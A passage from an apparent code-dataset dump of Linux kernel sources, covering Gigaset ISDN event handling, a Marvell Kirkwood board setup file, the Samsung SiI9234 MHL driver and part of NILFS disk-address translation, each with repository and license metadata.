if (cs->mode == M_UNIMODEM) {
cs->retry_count = 1;
schedule_sequence(cs, &cs->at_state, SEQ_CIDMODE);
return;
}
}
for (i = 0; i < cs->channels; ++i) {
bcs = cs->bcs + i;
if (bcs->at_state.pending_commands & PC_DLE1) {
bcs->at_state.pending_commands &= ~PC_DLE1;
cs->curchannel = bcs->channel;
schedule_sequence(cs, &cs->at_state, SEQ_DLE1);
return;
}
if (bcs->at_state.pending_commands & PC_ACCEPT) {
bcs->at_state.pending_commands &= ~PC_ACCEPT;
schedule_sequence(cs, &bcs->at_state, SEQ_ACCEPT);
return;
}
if (bcs->at_state.pending_commands & PC_DIAL) {
bcs->at_state.pending_commands &= ~PC_DIAL;
schedule_sequence(cs, &bcs->at_state, SEQ_DIAL);
return;
}
if (bcs->at_state.pending_commands & PC_CID) {
switch (cs->mode) {
case M_UNIMODEM:
cs->at_state.pending_commands |= PC_CIDMODE;
gig_dbg(DEBUG_EVENT, "Scheduling PC_CIDMODE");
cs->commands_pending = 1;
return;
case M_UNKNOWN:
schedule_init(cs, MS_INIT);
return;
}
bcs->at_state.pending_commands &= ~PC_CID;
cs->curchannel = bcs->channel;
cs->retry_count = 2;
schedule_sequence(cs, &cs->at_state, SEQ_CID);
return;
}
}
}
static void process_events(struct cardstate *cs)
{
struct event_t *ev;
unsigned head, tail;
int i;
int check_flags = 0;
int was_busy;
unsigned long flags;
spin_lock_irqsave(&cs->ev_lock, flags);
head = cs->ev_head;
for (i = 0; i < 2 * MAX_EVENTS; ++i) {
tail = cs->ev_tail;
if (tail == head) {
if (!check_flags && !cs->commands_pending)
break;
check_flags = 0;
spin_unlock_irqrestore(&cs->ev_lock, flags);
process_command_flags(cs);
spin_lock_irqsave(&cs->ev_lock, flags);
tail = cs->ev_tail;
if (tail == head) {
if (!cs->commands_pending)
break;
continue;
}
}
ev = cs->events + head;
was_busy = cs->cur_at_seq != SEQ_NONE;
spin_unlock_irqrestore(&cs->ev_lock, flags);
process_event(cs, ev);
spin_lock_irqsave(&cs->ev_lock, flags);
kfree(ev->ptr);
ev->ptr = NULL;
if (was_busy && cs->cur_at_seq == SEQ_NONE)
check_flags = 1;
head = (head + 1) % MAX_EVENTS;
cs->ev_head = head;
}
spin_unlock_irqrestore(&cs->ev_lock, flags);
if (i == 2 * MAX_EVENTS) {
dev_err(cs->dev,
"infinite loop in process_events; aborting.\n");
}
}
/* tasklet scheduled on any event received from the Gigaset device
* parameter:
* data ISDN controller state structure
*/
void gigaset_handle_event(unsigned long data)
{
struct cardstate *cs = (struct cardstate *) data;
/* handle incoming data on control/common channel */
if (cs->inbuf->head != cs->inbuf->tail) {
gig_dbg(DEBUG_INTR, "processing new data");
cs->ops->handle_input(cs->inbuf);
}
process_events(cs);
}
| gpl-2.0 |
Nico60/kernel_samsung_smdk4412 | arch/arm/mach-kirkwood/mv88f6281gtw_ge-setup.c | 2818 | 4251 | /*
* arch/arm/mach-kirkwood/mv88f6281gtw_ge-setup.c
*
* Marvell 88F6281 GTW GE Board Setup
*
* This file is licensed under the terms of the GNU General Public
* License version 2. This program is licensed "as is" without any
* warranty of any kind, whether express or implied.
*/
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/platform_device.h>
#include <linux/pci.h>
#include <linux/irq.h>
#include <linux/mtd/physmap.h>
#include <linux/timer.h>
#include <linux/mv643xx_eth.h>
#include <linux/ethtool.h>
#include <linux/gpio.h>
#include <linux/leds.h>
#include <linux/input.h>
#include <linux/gpio_keys.h>
#include <linux/spi/flash.h>
#include <linux/spi/spi.h>
#include <linux/spi/orion_spi.h>
#include <net/dsa.h>
#include <asm/mach-types.h>
#include <asm/mach/arch.h>
#include <asm/mach/pci.h>
#include <mach/kirkwood.h>
#include "common.h"
#include "mpp.h"
static struct mv643xx_eth_platform_data mv88f6281gtw_ge_ge00_data = {
.phy_addr = MV643XX_ETH_PHY_NONE,
.speed = SPEED_1000,
.duplex = DUPLEX_FULL,
};
static struct dsa_chip_data mv88f6281gtw_ge_switch_chip_data = {
.port_names[0] = "lan1",
.port_names[1] = "lan2",
.port_names[2] = "lan3",
.port_names[3] = "lan4",
.port_names[4] = "wan",
.port_names[5] = "cpu",
};
static struct dsa_platform_data mv88f6281gtw_ge_switch_plat_data = {
.nr_chips = 1,
.chip = &mv88f6281gtw_ge_switch_chip_data,
};
static const struct flash_platform_data mv88f6281gtw_ge_spi_slave_data = {
.type = "mx25l12805d",
};
static struct spi_board_info __initdata mv88f6281gtw_ge_spi_slave_info[] = {
{
.modalias = "m25p80",
.platform_data = &mv88f6281gtw_ge_spi_slave_data,
.irq = -1,
.max_speed_hz = 50000000,
.bus_num = 0,
.chip_select = 0,
},
};
static struct gpio_keys_button mv88f6281gtw_ge_button_pins[] = {
{
.code = KEY_RESTART,
.gpio = 47,
.desc = "SWR Button",
.active_low = 1,
}, {
.code = KEY_WPS_BUTTON,
.gpio = 46,
.desc = "WPS Button",
.active_low = 1,
},
};
static struct gpio_keys_platform_data mv88f6281gtw_ge_button_data = {
.buttons = mv88f6281gtw_ge_button_pins,
.nbuttons = ARRAY_SIZE(mv88f6281gtw_ge_button_pins),
};
static struct platform_device mv88f6281gtw_ge_buttons = {
.name = "gpio-keys",
.id = -1,
.num_resources = 0,
.dev = {
.platform_data = &mv88f6281gtw_ge_button_data,
},
};
static struct gpio_led mv88f6281gtw_ge_led_pins[] = {
{
.name = "gtw:green:Status",
.gpio = 20,
.active_low = 0,
}, {
.name = "gtw:red:Status",
.gpio = 21,
.active_low = 0,
}, {
.name = "gtw:green:USB",
.gpio = 12,
.active_low = 0,
},
};
static struct gpio_led_platform_data mv88f6281gtw_ge_led_data = {
.leds = mv88f6281gtw_ge_led_pins,
.num_leds = ARRAY_SIZE(mv88f6281gtw_ge_led_pins),
};
static struct platform_device mv88f6281gtw_ge_leds = {
.name = "leds-gpio",
.id = -1,
.dev = {
.platform_data = &mv88f6281gtw_ge_led_data,
},
};
static unsigned int mv88f6281gtw_ge_mpp_config[] __initdata = {
MPP12_GPO, /* Status#_USB pin */
MPP20_GPIO, /* Status#_GLED pin */
MPP21_GPIO, /* Status#_RLED pin */
MPP46_GPIO, /* WPS_Switch pin */
MPP47_GPIO, /* SW_Init pin */
0
};
static void __init mv88f6281gtw_ge_init(void)
{
/*
* Basic setup. Needs to be called early.
*/
kirkwood_init();
kirkwood_mpp_conf(mv88f6281gtw_ge_mpp_config);
kirkwood_ehci_init();
kirkwood_ge00_init(&mv88f6281gtw_ge_ge00_data);
kirkwood_ge00_switch_init(&mv88f6281gtw_ge_switch_plat_data, NO_IRQ);
spi_register_board_info(mv88f6281gtw_ge_spi_slave_info,
ARRAY_SIZE(mv88f6281gtw_ge_spi_slave_info));
kirkwood_spi_init();
kirkwood_uart0_init();
platform_device_register(&mv88f6281gtw_ge_leds);
platform_device_register(&mv88f6281gtw_ge_buttons);
}
static int __init mv88f6281gtw_ge_pci_init(void)
{
if (machine_is_mv88f6281gtw_ge())
kirkwood_pcie_init(KW_PCIE0);
return 0;
}
subsys_initcall(mv88f6281gtw_ge_pci_init);
MACHINE_START(MV88F6281GTW_GE, "Marvell 88F6281 GTW GE Board")
/* Maintainer: Lennert Buytenhek <buytenh@marvell.com> */
.boot_params = 0x00000100,
.init_machine = mv88f6281gtw_ge_init,
.map_io = kirkwood_map_io,
.init_early = kirkwood_init_early,
.init_irq = kirkwood_init_irq,
.timer = &kirkwood_timer,
MACHINE_END
| gpl-2.0 |
baselsayeh/Kyleopen-4.4 | drivers/media/video/s5p-tv/sii9234_drv.c | 4866 | 10938 | /*
* Samsung MHL interface driver
*
* Copyright (C) 2011 Samsung Electronics Co.Ltd
* Author: Tomasz Stanislawski <t.stanislaws@samsung.com>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*/
#include <linux/delay.h>
#include <linux/err.h>
#include <linux/freezer.h>
#include <linux/gpio.h>
#include <linux/i2c.h>
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/kthread.h>
#include <linux/module.h>
#include <linux/pm_runtime.h>
#include <linux/regulator/machine.h>
#include <linux/slab.h>
#include <mach/gpio.h>
#include <plat/gpio-cfg.h>
#include <media/sii9234.h>
#include <media/v4l2-subdev.h>
MODULE_AUTHOR("Tomasz Stanislawski <t.stanislaws@samsung.com>");
MODULE_DESCRIPTION("Samsung MHL interface driver");
MODULE_LICENSE("GPL");
struct sii9234_context {
struct i2c_client *client;
struct regulator *power;
int gpio_n_reset;
struct v4l2_subdev sd;
};
static inline struct sii9234_context *sd_to_context(struct v4l2_subdev *sd)
{
return container_of(sd, struct sii9234_context, sd);
}
static inline int sii9234_readb(struct i2c_client *client, int addr)
{
return i2c_smbus_read_byte_data(client, addr);
}
static inline int sii9234_writeb(struct i2c_client *client, int addr, int value)
{
return i2c_smbus_write_byte_data(client, addr, value);
}
static inline int sii9234_writeb_mask(struct i2c_client *client, int addr,
int value, int mask)
{
int ret;
ret = i2c_smbus_read_byte_data(client, addr);
if (ret < 0)
return ret;
ret = (ret & ~mask) | (value & mask);
return i2c_smbus_write_byte_data(client, addr, ret);
}
static inline int sii9234_readb_idx(struct i2c_client *client, int addr)
{
int ret;
ret = i2c_smbus_write_byte_data(client, 0xbc, addr >> 8);
if (ret < 0)
return ret;
ret = i2c_smbus_write_byte_data(client, 0xbd, addr & 0xff);
if (ret < 0)
return ret;
return i2c_smbus_read_byte_data(client, 0xbe);
}
static inline int sii9234_writeb_idx(struct i2c_client *client, int addr,
int value)
{
int ret;
ret = i2c_smbus_write_byte_data(client, 0xbc, addr >> 8);
if (ret < 0)
return ret;
ret = i2c_smbus_write_byte_data(client, 0xbd, addr & 0xff);
if (ret < 0)
return ret;
ret = i2c_smbus_write_byte_data(client, 0xbe, value);
return ret;
}
static inline int sii9234_writeb_idx_mask(struct i2c_client *client, int addr,
int value, int mask)
{
int ret;
ret = sii9234_readb_idx(client, addr);
if (ret < 0)
return ret;
ret = (ret & ~mask) | (value & mask);
return sii9234_writeb_idx(client, addr, ret);
}
static int sii9234_reset(struct sii9234_context *ctx)
{
struct i2c_client *client = ctx->client;
struct device *dev = &client->dev;
int ret, tries;
gpio_direction_output(ctx->gpio_n_reset, 1);
mdelay(1);
gpio_direction_output(ctx->gpio_n_reset, 0);
mdelay(1);
gpio_direction_output(ctx->gpio_n_reset, 1);
mdelay(1);
/* going to TTPI mode */
ret = sii9234_writeb(client, 0xc7, 0);
if (ret < 0) {
dev_err(dev, "failed to set TTPI mode\n");
return ret;
}
for (tries = 0; tries < 100 ; ++tries) {
ret = sii9234_readb(client, 0x1b);
if (ret > 0)
break;
if (ret < 0) {
dev_err(dev, "failed to reset device\n");
return -EIO;
}
mdelay(1);
}
if (tries == 100) {
dev_err(dev, "maximal number of tries reached\n");
return -EIO;
}
return 0;
}
static int sii9234_verify_version(struct i2c_client *client)
{
struct device *dev = &client->dev;
int family, rev, tpi_rev, dev_id, sub_id, hdcp, id;
family = sii9234_readb(client, 0x1b);
rev = sii9234_readb(client, 0x1c) & 0x0f;
tpi_rev = sii9234_readb(client, 0x1d) & 0x7f;
dev_id = sii9234_readb_idx(client, 0x0103);
sub_id = sii9234_readb_idx(client, 0x0102);
hdcp = sii9234_readb(client, 0x30);
if (family < 0 || rev < 0 || tpi_rev < 0 || dev_id < 0 ||
sub_id < 0 || hdcp < 0) {
dev_err(dev, "failed to read chip's version\n");
return -EIO;
}
id = (dev_id << 8) | sub_id;
dev_info(dev, "chip: SiL%02x family: %02x, rev: %02x\n",
id, family, rev);
dev_info(dev, "tpi_rev:%02x, hdcp: %02x\n", tpi_rev, hdcp);
if (id != 0x9234) {
dev_err(dev, "not supported chip\n");
return -ENODEV;
}
return 0;
}
static u8 data[][3] = {
/* setup from driver created by doonsoo45.kim */
{ 0x01, 0x05, 0x04 }, /* Enable Auto soft reset on SCDT = 0 */
{ 0x01, 0x08, 0x35 }, /* Power Up TMDS Tx Core */
{ 0x01, 0x0d, 0x1c }, /* HDMI Transcode mode enable */
{ 0x01, 0x2b, 0x01 }, /* Enable HDCP Compliance workaround */
{ 0x01, 0x79, 0x40 }, /* daniel test...MHL_INT */
{ 0x01, 0x80, 0x34 }, /* Enable Rx PLL Clock Value */
{ 0x01, 0x90, 0x27 }, /* Enable CBUS discovery */
{ 0x01, 0x91, 0xe5 }, /* Skip RGND detection */
{ 0x01, 0x92, 0x46 }, /* Force MHD mode */
{ 0x01, 0x93, 0xdc }, /* Disable CBUS pull-up during RGND measurement */
{ 0x01, 0x94, 0x66 }, /* 1.8V CBUS VTH & GND threshold */
{ 0x01, 0x95, 0x31 }, /* RGND block & single discovery attempt */
{ 0x01, 0x96, 0x22 }, /* use 1K and 2K setting */
{ 0x01, 0xa0, 0x10 }, /* SIMG: Term mode */
{ 0x01, 0xa1, 0xfc }, /* Disable internal Mobile HD driver */
{ 0x01, 0xa3, 0xfa }, /* SIMG: Output Swing default EB, 3x Clk Mult */
{ 0x01, 0xa5, 0x80 }, /* SIMG: RGND Hysterisis, 3x mode for Beast */
{ 0x01, 0xa6, 0x0c }, /* SIMG: Swing Offset */
{ 0x02, 0x3d, 0x3f }, /* Power up CVCC 1.2V core */
{ 0x03, 0x00, 0x00 }, /* SIMG: correcting HW default */
{ 0x03, 0x11, 0x01 }, /* Enable TxPLL Clock */
{ 0x03, 0x12, 0x15 }, /* Enable Tx Clock Path & Equalizer */
{ 0x03, 0x13, 0x60 }, /* SIMG: Set termination value */
{ 0x03, 0x14, 0xf0 }, /* SIMG: Change CKDT level */
{ 0x03, 0x17, 0x07 }, /* SIMG: PLL Calrefsel */
{ 0x03, 0x1a, 0x20 }, /* VCO Cal */
{ 0x03, 0x22, 0xe0 }, /* SIMG: Auto EQ */
{ 0x03, 0x23, 0xc0 }, /* SIMG: Auto EQ */
{ 0x03, 0x24, 0xa0 }, /* SIMG: Auto EQ */
{ 0x03, 0x25, 0x80 }, /* SIMG: Auto EQ */
{ 0x03, 0x26, 0x60 }, /* SIMG: Auto EQ */
{ 0x03, 0x27, 0x40 }, /* SIMG: Auto EQ */
{ 0x03, 0x28, 0x20 }, /* SIMG: Auto EQ */
{ 0x03, 0x29, 0x00 }, /* SIMG: Auto EQ */
{ 0x03, 0x31, 0x0b }, /* SIMG: Rx PLL BW value from I2C BW ~ 4MHz */
{ 0x03, 0x45, 0x06 }, /* SIMG: DPLL Mode */
{ 0x03, 0x4b, 0x06 }, /* SIMG: Correcting HW default */
{ 0x03, 0x4c, 0xa0 }, /* Manual zone control */
{ 0x03, 0x4d, 0x02 }, /* SIMG: PLL Mode Value (order is important) */
};
static int sii9234_set_internal(struct sii9234_context *ctx)
{
struct i2c_client *client = ctx->client;
int i, ret;
for (i = 0; i < ARRAY_SIZE(data); ++i) {
int addr = (data[i][0] << 8) | data[i][1];
ret = sii9234_writeb_idx(client, addr, data[i][2]);
if (ret < 0)
return ret;
}
return 0;
}
static int sii9234_runtime_suspend(struct device *dev)
{
struct v4l2_subdev *sd = dev_get_drvdata(dev);
struct sii9234_context *ctx = sd_to_context(sd);
struct i2c_client *client = ctx->client;
dev_info(dev, "suspend start\n");
sii9234_writeb_mask(client, 0x1e, 3, 3);
regulator_disable(ctx->power);
return 0;
}
static int sii9234_runtime_resume(struct device *dev)
{
struct v4l2_subdev *sd = dev_get_drvdata(dev);
struct sii9234_context *ctx = sd_to_context(sd);
struct i2c_client *client = ctx->client;
int ret;
dev_info(dev, "resume start\n");
regulator_enable(ctx->power);
ret = sii9234_reset(ctx);
if (ret)
goto fail;
/* enable tpi */
ret = sii9234_writeb_mask(client, 0x1e, 1, 0);
if (ret < 0)
goto fail;
ret = sii9234_set_internal(ctx);
if (ret < 0)
goto fail;
return 0;
fail:
dev_err(dev, "failed to resume\n");
regulator_disable(ctx->power);
return ret;
}
static const struct dev_pm_ops sii9234_pm_ops = {
.runtime_suspend = sii9234_runtime_suspend,
.runtime_resume = sii9234_runtime_resume,
};
static int sii9234_s_power(struct v4l2_subdev *sd, int on)
{
struct sii9234_context *ctx = sd_to_context(sd);
int ret;
if (on)
ret = pm_runtime_get_sync(&ctx->client->dev);
else
ret = pm_runtime_put(&ctx->client->dev);
/* only values < 0 indicate errors */
return IS_ERR_VALUE(ret) ? ret : 0;
}
static int sii9234_s_stream(struct v4l2_subdev *sd, int enable)
{
struct sii9234_context *ctx = sd_to_context(sd);
/* (dis/en)able TDMS output */
sii9234_writeb_mask(ctx->client, 0x1a, enable ? 0 : ~0 , 1 << 4);
return 0;
}
static const struct v4l2_subdev_core_ops sii9234_core_ops = {
.s_power = sii9234_s_power,
};
static const struct v4l2_subdev_video_ops sii9234_video_ops = {
.s_stream = sii9234_s_stream,
};
static const struct v4l2_subdev_ops sii9234_ops = {
.core = &sii9234_core_ops,
.video = &sii9234_video_ops,
};
static int __devinit sii9234_probe(struct i2c_client *client,
const struct i2c_device_id *id)
{
struct device *dev = &client->dev;
struct sii9234_platform_data *pdata = dev->platform_data;
struct sii9234_context *ctx;
int ret;
ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
if (!ctx) {
dev_err(dev, "out of memory\n");
ret = -ENOMEM;
goto fail;
}
ctx->client = client;
ctx->power = regulator_get(dev, "hdmi-en");
if (IS_ERR(ctx->power)) {
dev_err(dev, "failed to acquire regulator hdmi-en\n");
ret = PTR_ERR(ctx->power);
goto fail_ctx;
}
ctx->gpio_n_reset = pdata->gpio_n_reset;
ret = gpio_request(ctx->gpio_n_reset, "MHL_RST");
if (ret) {
dev_err(dev, "failed to acquire MHL_RST gpio\n");
goto fail_power;
}
v4l2_i2c_subdev_init(&ctx->sd, client, &sii9234_ops);
pm_runtime_enable(dev);
/* enable device */
ret = pm_runtime_get_sync(dev);
if (ret)
goto fail_pm;
/* verify chip version */
ret = sii9234_verify_version(client);
if (ret)
goto fail_pm_get;
/* stop processing */
pm_runtime_put(dev);
dev_info(dev, "probe successful\n");
return 0;
fail_pm_get:
pm_runtime_put_sync(dev);
fail_pm:
pm_runtime_disable(dev);
gpio_free(ctx->gpio_n_reset);
fail_power:
regulator_put(ctx->power);
fail_ctx:
kfree(ctx);
fail:
dev_err(dev, "probe failed\n");
return ret;
}
static int __devexit sii9234_remove(struct i2c_client *client)
{
struct device *dev = &client->dev;
struct v4l2_subdev *sd = i2c_get_clientdata(client);
struct sii9234_context *ctx = sd_to_context(sd);
pm_runtime_disable(dev);
gpio_free(ctx->gpio_n_reset);
regulator_put(ctx->power);
kfree(ctx);
dev_info(dev, "remove successful\n");
return 0;
}
static const struct i2c_device_id sii9234_id[] = {
{ "SII9234", 0 },
{ },
};
MODULE_DEVICE_TABLE(i2c, sii9234_id);
static struct i2c_driver sii9234_driver = {
.driver = {
.name = "sii9234",
.owner = THIS_MODULE,
.pm = &sii9234_pm_ops,
},
.probe = sii9234_probe,
.remove = __devexit_p(sii9234_remove),
.id_table = sii9234_id,
};
static int __init sii9234_init(void)
{
return i2c_add_driver(&sii9234_driver);
}
module_init(sii9234_init);
static void __exit sii9234_exit(void)
{
i2c_del_driver(&sii9234_driver);
}
module_exit(sii9234_exit);
| gpl-2.0 |
baolfire/aries_kernel_pexcn | fs/nilfs2/dat.c | 4866 | 13261 | /*
* dat.c - NILFS disk address translation.
*
* Copyright (C) 2006-2008 Nippon Telegraph and Telephone Corporation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
* Written by Koji Sato <koji@osrg.net>.
*/
#include <linux/types.h>
#include <linux/buffer_head.h>
#include <linux/string.h>
#include <linux/errno.h>
#include "nilfs.h"
#include "mdt.h"
#include "alloc.h"
#include "dat.h"
#define NILFS_CNO_MIN ((__u64)1)
#define NILFS_CNO_MAX (~(__u64)0)
struct nilfs_dat_info {
struct nilfs_mdt_info mi;
struct nilfs_palloc_cache palloc_cache;
struct nilfs_shadow_map shadow;
};
static inline struct nilfs_dat_info *NILFS_DAT_I(struct inode *dat)
{
return (struct nilfs_dat_info *)NILFS_MDT(dat);
}
static int nilfs_dat_prepare_entry(struct inode *dat,
struct nilfs_palloc_req *req, int create)
{
return nilfs_palloc_get_entry_block(dat, req->pr_entry_nr,
create, &req->pr_entry_bh);
}
static void nilfs_dat_commit_entry(struct inode *dat,
struct nilfs_palloc_req *req)
{
mark_buffer_dirty(req->pr_entry_bh);
nilfs_mdt_mark_dirty(dat);
brelse(req->pr_entry_bh);
}
static void nilfs_dat_abort_entry(struct inode *dat,
struct nilfs_palloc_req *req)
{
brelse(req->pr_entry_bh);
}
int nilfs_dat_prepare_alloc(struct inode *dat, struct nilfs_palloc_req *req)
{
int ret;
ret = nilfs_palloc_prepare_alloc_entry(dat, req);
if (ret < 0)
return ret;
ret = nilfs_dat_prepare_entry(dat, req, 1);
if (ret < 0)
nilfs_palloc_abort_alloc_entry(dat, req);
return ret;
}
void nilfs_dat_commit_alloc(struct inode *dat, struct nilfs_palloc_req *req)
{
struct nilfs_dat_entry *entry;
void *kaddr;
kaddr = kmap_atomic(req->pr_entry_bh->b_page);
entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
req->pr_entry_bh, kaddr);
entry->de_start = cpu_to_le64(NILFS_CNO_MIN);
entry->de_end = cpu_to_le64(NILFS_CNO_MAX);
entry->de_blocknr = cpu_to_le64(0);
kunmap_atomic(kaddr);
nilfs_palloc_commit_alloc_entry(dat, req);
nilfs_dat_commit_entry(dat, req);
}
void nilfs_dat_abort_alloc(struct inode *dat, struct nilfs_palloc_req *req)
{
nilfs_dat_abort_entry(dat, req);
nilfs_palloc_abort_alloc_entry(dat, req);
}
static void nilfs_dat_commit_free(struct inode *dat,
struct nilfs_palloc_req *req)
{
struct nilfs_dat_entry *entry;
void *kaddr;
kaddr = kmap_atomic(req->pr_entry_bh->b_page);
entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
req->pr_entry_bh, kaddr);
entry->de_start = cpu_to_le64(NILFS_CNO_MIN);
entry->de_end = cpu_to_le64(NILFS_CNO_MIN);
entry->de_blocknr = cpu_to_le64(0);
kunmap_atomic(kaddr);
nilfs_dat_commit_entry(dat, req);
nilfs_palloc_commit_free_entry(dat, req);
}
int nilfs_dat_prepare_start(struct inode *dat, struct nilfs_palloc_req *req)
{
int ret;
ret = nilfs_dat_prepare_entry(dat, req, 0);
WARN_ON(ret == -ENOENT);
return ret;
}
void nilfs_dat_commit_start(struct inode *dat, struct nilfs_palloc_req *req,
sector_t blocknr)
{
struct nilfs_dat_entry *entry;
void *kaddr;
kaddr = kmap_atomic(req->pr_entry_bh->b_page);
entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
req->pr_entry_bh, kaddr);
entry->de_start = cpu_to_le64(nilfs_mdt_cno(dat));
entry->de_blocknr = cpu_to_le64(blocknr);
kunmap_atomic(kaddr);
nilfs_dat_commit_entry(dat, req);
}
int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
{
struct nilfs_dat_entry *entry;
__u64 start;
sector_t blocknr;
void *kaddr;
int ret;
ret = nilfs_dat_prepare_entry(dat, req, 0);
if (ret < 0) {
WARN_ON(ret == -ENOENT);
return ret;
}
kaddr = kmap_atomic(req->pr_entry_bh->b_page);
entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
req->pr_entry_bh, kaddr);
start = le64_to_cpu(entry->de_start);
blocknr = le64_to_cpu(entry->de_blocknr);
kunmap_atomic(kaddr);
if (blocknr == 0) {
ret = nilfs_palloc_prepare_free_entry(dat, req);
if (ret < 0) {
nilfs_dat_abort_entry(dat, req);
return ret;
}
}
return 0;
}
void nilfs_dat_commit_end(struct inode *dat, struct nilfs_palloc_req *req,
int dead)
{
struct nilfs_dat_entry *entry;
__u64 start, end;
sector_t blocknr;
void *kaddr;
kaddr = kmap_atomic(req->pr_entry_bh->b_page);
entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
req->pr_entry_bh, kaddr);
end = start = le64_to_cpu(entry->de_start);
if (!dead) {
end = nilfs_mdt_cno(dat);
WARN_ON(start > end);
}
entry->de_end = cpu_to_le64(end);
blocknr = le64_to_cpu(entry->de_blocknr);
kunmap_atomic(kaddr);
if (blocknr == 0)
nilfs_dat_commit_free(dat, req);
else
nilfs_dat_commit_entry(dat, req);
}
void nilfs_dat_abort_end(struct inode *dat, struct nilfs_palloc_req *req)
{
struct nilfs_dat_entry *entry;
__u64 start;
sector_t blocknr;
void *kaddr;
kaddr = kmap_atomic(req->pr_entry_bh->b_page);
entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
req->pr_entry_bh, kaddr);
start = le64_to_cpu(entry->de_start);
blocknr = le64_to_cpu(entry->de_blocknr);
kunmap_atomic(kaddr);
if (start == nilfs_mdt_cno(dat) && blocknr == 0)
nilfs_palloc_abort_free_entry(dat, req);
nilfs_dat_abort_entry(dat, req);
}
int nilfs_dat_prepare_update(struct inode *dat,
struct nilfs_palloc_req *oldreq,
struct nilfs_palloc_req *newreq)
{
int ret;
ret = nilfs_dat_prepare_end(dat, oldreq);
if (!ret) {
ret = nilfs_dat_prepare_alloc(dat, newreq);
if (ret < 0)
nilfs_dat_abort_end(dat, oldreq);
}
return ret;
}
void nilfs_dat_commit_update(struct inode *dat,
struct nilfs_palloc_req *oldreq,
struct nilfs_palloc_req *newreq, int dead)
{
nilfs_dat_commit_end(dat, oldreq, dead);
nilfs_dat_commit_alloc(dat, newreq);
}
void nilfs_dat_abort_update(struct inode *dat,
struct nilfs_palloc_req *oldreq,
struct nilfs_palloc_req *newreq)
{
nilfs_dat_abort_end(dat, oldreq);
nilfs_dat_abort_alloc(dat, newreq);
}
/**
* nilfs_dat_mark_dirty -
* @dat: DAT file inode
* @vblocknr: virtual block number
*
* Description:
*
* Return Value: On success, 0 is returned. On error, one of the following
* negative error codes is returned.
*
* %-EIO - I/O error.
*
* %-ENOMEM - Insufficient amount of memory available.
*/
int nilfs_dat_mark_dirty(struct inode *dat, __u64 vblocknr)
{
struct nilfs_palloc_req req;
int ret;
req.pr_entry_nr = vblocknr;
ret = nilfs_dat_prepare_entry(dat, &req, 0);
if (ret == 0)
nilfs_dat_commit_entry(dat, &req);
return ret;
}
/**
* nilfs_dat_freev - free virtual block numbers
* @dat: DAT file inode
* @vblocknrs: array of virtual block numbers
* @nitems: number of virtual block numbers
*
* Description: nilfs_dat_freev() frees the virtual block numbers specified by
* @vblocknrs and @nitems.
*
* Return Value: On success, 0 is returned. On error, one of the following
* negative error codes is returned.
*
* %-EIO - I/O error.
*
* %-ENOMEM - Insufficient amount of memory available.
*
* %-ENOENT - The virtual block number have not been allocated.
*/
int nilfs_dat_freev(struct inode *dat, __u64 *vblocknrs, size_t nitems)
{
return nilfs_palloc_freev(dat, vblocknrs, nitems);
}
/**
* nilfs_dat_move - change a block number
* @dat: DAT file inode
* @vblocknr: virtual block number
* @blocknr: block number
*
* Description: nilfs_dat_move() changes the block number associated with
* @vblocknr to @blocknr.
*
* Return Value: On success, 0 is returned. On error, one of the following
* negative error codes is returned.
*
* %-EIO - I/O error.
*
* %-ENOMEM - Insufficient amount of memory available.
*/
int nilfs_dat_move(struct inode *dat, __u64 vblocknr, sector_t blocknr)
{
struct buffer_head *entry_bh;
struct nilfs_dat_entry *entry;
void *kaddr;
int ret;
ret = nilfs_palloc_get_entry_block(dat, vblocknr, 0, &entry_bh);
if (ret < 0)
return ret;
/*
* The given disk block number (blocknr) is not yet written to
* the device at this point.
*
* To prevent nilfs_dat_translate() from returning the
* uncommitted block number, this makes a copy of the entry
* buffer and redirects nilfs_dat_translate() to the copy.
*/
if (!buffer_nilfs_redirected(entry_bh)) {
ret = nilfs_mdt_freeze_buffer(dat, entry_bh);
if (ret) {
brelse(entry_bh);
return ret;
}
}
kaddr = kmap_atomic(entry_bh->b_page);
entry = nilfs_palloc_block_get_entry(dat, vblocknr, entry_bh, kaddr);
if (unlikely(entry->de_blocknr == cpu_to_le64(0))) {
printk(KERN_CRIT "%s: vbn = %llu, [%llu, %llu)\n", __func__,
(unsigned long long)vblocknr,
(unsigned long long)le64_to_cpu(entry->de_start),
(unsigned long long)le64_to_cpu(entry->de_end));
kunmap_atomic(kaddr);
brelse(entry_bh);
return -EINVAL;
}
WARN_ON(blocknr == 0);
entry->de_blocknr = cpu_to_le64(blocknr);
kunmap_atomic(kaddr);
mark_buffer_dirty(entry_bh);
nilfs_mdt_mark_dirty(dat);
brelse(entry_bh);
return 0;
}
/**
* nilfs_dat_translate - translate a virtual block number to a block number
* @dat: DAT file inode
* @vblocknr: virtual block number
* @blocknrp: pointer to a block number
*
* Description: nilfs_dat_translate() maps the virtual block number @vblocknr
* to the corresponding block number.
*
* Return Value: On success, 0 is returned and the block number associated
* with @vblocknr is stored in the place pointed by @blocknrp. On error, one
* of the following negative error codes is returned.
*
* %-EIO - I/O error.
*
* %-ENOMEM - Insufficient amount of memory available.
*
* %-ENOENT - A block number associated with @vblocknr does not exist.
*/
int nilfs_dat_translate(struct inode *dat, __u64 vblocknr, sector_t *blocknrp)
{
struct buffer_head *entry_bh, *bh;
struct nilfs_dat_entry *entry;
sector_t blocknr;
void *kaddr;
int ret;
ret = nilfs_palloc_get_entry_block(dat, vblocknr, 0, &entry_bh);
if (ret < 0)
return ret;
